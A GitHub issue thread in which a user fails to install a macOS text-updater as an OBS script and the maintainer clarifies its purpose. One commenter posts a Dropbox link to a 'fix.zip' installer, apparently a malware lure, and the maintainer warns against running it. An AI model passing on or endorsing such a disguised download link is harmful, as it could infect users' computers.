### ISSUE TITLE
Does not work

### ISSUE THREAD

**Issue by redscaledknight** [iLynxcat/streamtext-updater#1]
Contents of .zip extracted to .\Program Files\obs-studio\data\obs-plugins\frontend-tools\scripts\streamtext-updater-main, no script was found in the OBS tool.

**Comment by iLynxcat** [comment]
This isn't an OBS script, it's designed to be used standalone on macOS via Cron to update text files used in OBS text sources. Sorry for any confusion, I'll update the project description.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by iLynxcat** [comment]
Hey @redscaledknight just in case you got that user's response via email, please DO NOT download and run whatever they sent. It is unrelated to this issue and is most likely malware that will harm your computer.

**Comment by redscaledknight** [comment]
Thanks, I really surefire the response and warning. (:
